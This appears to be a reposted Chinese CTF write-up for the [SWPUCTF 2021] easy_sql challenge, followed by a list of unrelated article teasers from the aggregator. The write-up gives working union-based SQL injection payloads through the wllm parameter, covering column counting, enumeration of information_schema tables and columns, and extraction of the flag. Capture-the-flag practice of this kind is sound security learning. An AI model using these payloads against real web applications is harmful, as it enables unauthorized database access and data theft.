字符型注入（[SWPUCTF 2021 新生赛]easy_sql）

字符型注入（[SWPUCTF 2021 新生赛]easy_sql）

news/2025/4/19 8:17:05/文章来源:https://blog.csdn.net/lkbzhj/article/details/132656138

拿到题目，查看源码，可知是要输入参数wllm。

输入参数/?wllm=1，得到会显

继续输入参数/?wllm=1'，报错，确定为字符型漏洞

1.查看字段列表，发现在字段4报错，确定为3列

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

2.查看回显

?wllm=-1' union select 1,2,3--+

3.查询数据库名（test_db)

?wllm=-1' union select 1,2,database()--+

4.查看test_db库的表(users)

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

5.查询字段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

6.出现flag字段，查看flag字段的内容

/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+

出现flag字段，成功解出

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/66517.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

leetcode做题笔记118. 杨辉三角

leetcode做题笔记118. 杨辉三角

给定一个非负整数 numRows，生成「杨辉三角」的前 numRows 行。在「杨辉三角」中，每个数是它左上方和右上方的数的和。思路一：动态规划 int** generate(int numRows, int* returnSize, int** returnColumnSizes){int **returnnum(int **)…

阅读更多...

QT DAY 2

QT DAY 2

window.cpp #include "window.h" #include<QDebug> #include<QIcon> Window::Window(QWidget *parent) //构造函数的定义: QWidget(parent) //显性调用父类的构造函数 {//this->resize(430,330);this->resize(QSize(800,600));// this…

阅读更多...

数据结构——单调栈

数据结构——单调栈

前导： 队列，栈，前面的链接是对普通的栈，和普通的队列的一个讲解，如果没有对普通的栈和队列不了解的小伙伴可以先看看前面链接中的讲解； 什么是单调，一个序列呈递增或者递减，并且没有…

阅读更多...

Spring-Kafka生产者源码分析

Spring-Kafka生产者源码分析

文章目录概要初始化消息发送小结概要本文主要概括Spring Kafka生产者发送消息的主流程代码准备： SpringBoot项目中maven填加以下依赖 <parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent&…

阅读更多...

Flink提交jar出现错误RestHandlerException: No jobs included in application.

Flink提交jar出现错误RestHandlerException: No jobs included in application.

今天打包一个flink的maven工程为jar，通过flink webUI提交，发现居然报错。如上图所示，提示错误为： Server Response Message: org.apache.flink.runtime.rest.handler.RestHandlerException: No jobs included in application. …

阅读更多...

Java 线程池概念总结（thread pool）

Java 线程池概念总结（thread pool）

一、池化思想的应用池化思想是一种常见软件设计和优化技术。以下是几个常见池化思想应用场景： 线程池：线程池是池化思想一个典型应用。通过预先创建一组线程并将它们置于就绪状态，以复用线程减少线程创建和销毁的开销，并提高系统…

阅读更多...

Auto-GPT 学习笔记

Auto-GPT 学习笔记

Auto-GPT 学习笔记 Auto-GPT 简介 Auto-GPT 是一个基于 GPT-4 的自主智能体实验项目。它展示了大规模语言模型的规划、记忆和工具使用能力。Auto-GPT 的目标是实现一个完全自主的 AI 代理。GitHub 仓库 Auto-GPT 核心模块规划(Planning) 使用强化学习策略进行多跳思考。通…

阅读更多...

两种动态代理比较（补充），进程通信方式总结

两种动态代理比较（补充），进程通信方式总结

jdk和CGLib动态代理: jdk动态代理： java提供的动态代理技术； spring aop默认采用的方式； 只能对实现了至少一个接口的类生成代理对象； CGLib动态代理： 采用底层字节码技术； 目标对象没有实现接口时采…

阅读更多...

Nginx特性应用及载装

Nginx特性应用及载装

Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器。其特点是占有内存少，并发能力强，事实上nginx的并发能力在同类型的网页服务器中表现较好，中国大陆使用nginx的网站有：网易、腾讯、阿里等。 …

阅读更多...

文字识别的

文字识别的

对于 PDF 提取文字，Tesseract OCR 是一个常用的工具。你可以使用 Tesseract OCR 的 Java API 来实现。以下是一个使用 Tesseract OCR 提取 PDF 文档文字的简单示例代码： import net.sourceforge.tess4j.Tesseract; import net.sourceforge.tess4j.Tesse…

阅读更多...

MyBatis-Plus —— 初窥门径

MyBatis-Plus —— 初窥门径

前言在前面的文章中荔枝梳理了MyBatis及相关的操作，作为MyBatis的增强工具，MyBatis-Plus无需再在xml中写sql语句，在这篇文章中荔枝将梳理MyBatis-Plus的基础知识并基于SpringBoot梳理MyBatis-Plus给出的两个接口：BaseMapper和ISe…

阅读更多...

对象模型和this指针(个人学习笔记黑马学习)

对象模型和this指针(个人学习笔记黑马学习)

1、成员变量和成员函数 #include <iostream> using namespace std; #include <string>//成员变量和成员函数分开存储class Person {int m_A;//非静态成员变量属于类的对象上的static int m_B;//静态成员变量不属于类的对象上void func() {} //非静态成员函数不…

阅读更多...

LeetCode 1921. Eliminate Maximum Number of Monsters【贪心,计数排序】1527

LeetCode 1921. Eliminate Maximum Number of Monsters【贪心,计数排序】1527

本文属于「征服LeetCode」系列文章之一，这一系列正式开始于2021/08/12。由于LeetCode上部分题目有锁，本系列将至少持续到刷完所有无锁题之日为止；由于LeetCode还在不断地创建新题，本系列的终止日期可能是永远。在这一系列刷题文章…

阅读更多...

供应链 | 顶会CIKM论文精读：面向大规模三维装箱问题的数据驱动树形搜索算法

供应链 | 顶会CIKM论文精读：面向大规模三维装箱问题的数据驱动树形搜索算法

论文解读：丁建辉，李明哲，赵艳蓉，孙楚天编者按本次解读的文章发表于CCF-B类会议30th ACM International Conference on Information and Knowledge Management。摘要总结如下： 3维装箱问题（3D-BPP&#…

阅读更多...

Redis的缓存穿透，缓存击穿，缓存雪崩

Redis的缓存穿透，缓存击穿，缓存雪崩

1. 缓存穿透什么是缓存穿透？ 缓存穿透说简单点就是大量请求的 key 是不合理的，根本不存在于缓存中，也不存在于数据库中。这就导致这些请求直接到了数据库上，根本没有经过缓存这一层，对数据库造成了巨大的压力&…

阅读更多...

雪花算法生成id分析与实践

雪花算法生成id分析与实践

目录 1 什么是雪花算法？ 结构优点缺点 2 在java中使用使用注意： 测试代码效果 1 什么是雪花算法？ witter的雪花算法（Snowflake Algorithm）。雪花ID是一种分布式唯一ID生成算法，旨在解决分布式…

阅读更多...

业绩走低，毛利率下滑，海外市场能否成为极米科技救命稻草？

业绩走低，毛利率下滑，海外市场能否成为极米科技救命稻草？

撰稿|行星来源|贝多财经 8月30日，成都极米科技股份有限公司（SH:688696，下称“极米科技”）发布2023年半年度业绩报告。财报显示，极米科技2023年上半年的业绩出现了大幅下滑，其中收入同比减少两成&#xf…

阅读更多...

代码随想录二刷day06

代码随想录二刷day06

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录前言一、力扣242. 有效的字母异位词二、力扣349. 两个数组的交集三、力扣202. 快乐数四、力扣1两数之和前言一、力扣242. 有效的字母异位词 class Solution {pub…

阅读更多...

数学建模-点评笔记 9月3日

数学建模-点评笔记 9月3日

1.摘要：关键方法和结论（精炼的语言）要说明，方法的合理性和意义也可以说明。评委先通过摘要筛选（第一轮） 2.时间序列找异常值除了3西格玛还有针对时间序列更合适寻找的方法 3.模型的优缺点要写的详细一点…

阅读更多...

世微AP9234 升压型DC/DC LED恒流驱动

世微AP9234 升压型DC/DC LED恒流驱动

描述 AP9234是一款由基准电压源、振荡电路、误差放大电路、相位补偿电路、电流限制电路等构成的CMOS升压型DC/DC LED驱动。由于内置了低导通电阻的增强型N沟道功率MOSFET，因此适用于需要高效率、高输出电流的应用电路。另外，可通过在VSENSE端子连接电流…

阅读更多...

最新文章